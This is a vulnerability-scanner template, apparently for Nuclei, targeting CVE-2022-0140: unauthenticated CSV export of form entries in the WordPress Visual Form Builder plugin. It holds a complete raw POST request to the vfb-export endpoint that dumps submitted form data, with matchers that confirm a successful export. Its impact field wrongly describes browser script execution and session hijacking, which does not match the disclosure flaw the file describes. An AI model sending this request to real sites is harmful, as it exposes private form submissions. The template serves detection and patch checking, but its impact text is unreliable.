id: CVE-2022-0140

info:
  name: WordPress Visual Form Builder <3.0.8 - Information Disclosure
  author: random-robbie
  severity: medium
  description: |
    WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
    - https://www.fortiguard.com/zeroday/FG-VD-21-082
    - https://nvd.nist.gov/vuln/detail/cve-2022-0140
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0140
    cwe-id: CWE-306
    epss-score: 0.00966
    epss-percentile: 0.8297
    cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: vfbpro
    product: visual_form_builder
    framework: wordpress
  tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/admin.php?page=vfb-export
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Date Submitted"'
          - '"Entries ID"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210094ecbaa0e3ac781a418d224da0c83ecd9aa4bb1f5435952f856b8d6a8266e42a022100f56758fa6a035b7c3de85c68b70368a140d03b7566f13bbd5024e86b38cba445:922c64590222798bb761d5b6d8e72950